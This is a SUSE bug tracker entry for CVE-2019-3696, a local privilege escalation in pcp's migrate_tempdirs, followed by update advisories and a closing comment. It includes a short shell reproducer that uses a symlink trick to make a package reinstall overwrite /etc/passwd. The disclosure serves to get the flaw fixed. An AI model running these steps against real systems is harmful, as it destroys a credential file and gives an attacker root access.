Bugzilla – Bug 1153921
VUL-0: CVE-2019-3696: pcp: LPE through migrate_tempdirs
Last modified: 2023-09-21 07:47:57 UTC
The mv in migrate_tempdirs can be exploited for LPE. Reproducer: Create a backup of /etc/passwd before trying this or do it in a disposable VM As pcp: mkdir /var/tmp/pmlogger chmod +t /var/tmp/pmlogger cd /var/tmp/pmlogger echo owned > passwd mkdir /var/lib/pcp/tmp/pmlogger cd /var/lib/pcp/tmp/pmlogger ln -s /etc/ passwd As root: zypper in -f pcp After installation: cat /etc/passwd owned
Please use CVE-2019-3696 and submit for this. Thank you
Public and released to all codestreams
SUSE-SU-2020:0355-1: An update that solves two vulnerabilities and has one errata is now available. Category: security (important) Bug References: 1129991,1152763,1153921 CVE References: CVE-2019-3695,CVE-2019-3696 Sources used: SUSE Linux Enterprise Module for Open Buildservice Development Tools 15-SP1 (src): pcp-4.3.1-3.5.3 SUSE Linux Enterprise Module for Development Tools 15-SP1 (src): pcp-4.3.1-3.5.3 NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
SUSE-SU-2020:0356-1: An update that solves two vulnerabilities and has one errata is now available. Category: security (important) Bug References: 1129991,1152763,1153921 CVE References: CVE-2019-3695,CVE-2019-3696 Sources used: SUSE Linux Enterprise Software Development Kit 12-SP5 (src): pcp-3.11.9-6.14.1 SUSE Linux Enterprise Software Development Kit 12-SP4 (src): pcp-3.11.9-6.14.1 NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
SUSE-SU-2020:0357-1: An update that solves two vulnerabilities and has one errata is now available. Category: security (important) Bug References: 1129991,1152763,1153921 CVE References: CVE-2019-3695,CVE-2019-3696 Sources used: SUSE Linux Enterprise Server for SAP 15 (src): pcp-3.11.9-5.8.1 SUSE Linux Enterprise Server 15-LTSS (src): pcp-3.11.9-5.8.1 SUSE Linux Enterprise Module for Open Buildservice Development Tools 15-SP1 (src): pcp-3.11.9-5.8.1 SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (src): pcp-3.11.9-5.8.1 SUSE Linux Enterprise Module for Development Tools 15 (src): pcp-3.11.9-5.8.1 SUSE Linux Enterprise High Performance Computing 15-LTSS (src): pcp-3.11.9-5.8.1 SUSE Linux Enterprise High Performance Computing 15-ESPOS (src): pcp-3.11.9-5.8.1 NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
openSUSE-SU-2020:0213-1: An update that solves two vulnerabilities and has one errata is now available. Category: security (important) Bug References: 1129991,1152763,1153921 CVE References: CVE-2019-3695,CVE-2019-3696 Sources used: openSUSE Leap 15.1 (src): pcp-4.3.1-lp151.2.3.1
Snippet is still in Factory. Can you please fix it there too? Thans
(In reply to Johannes Segitz from comment #11) > Snippet is still in Factory. Can you please fix it there too? Thans Fixed in factory, closing...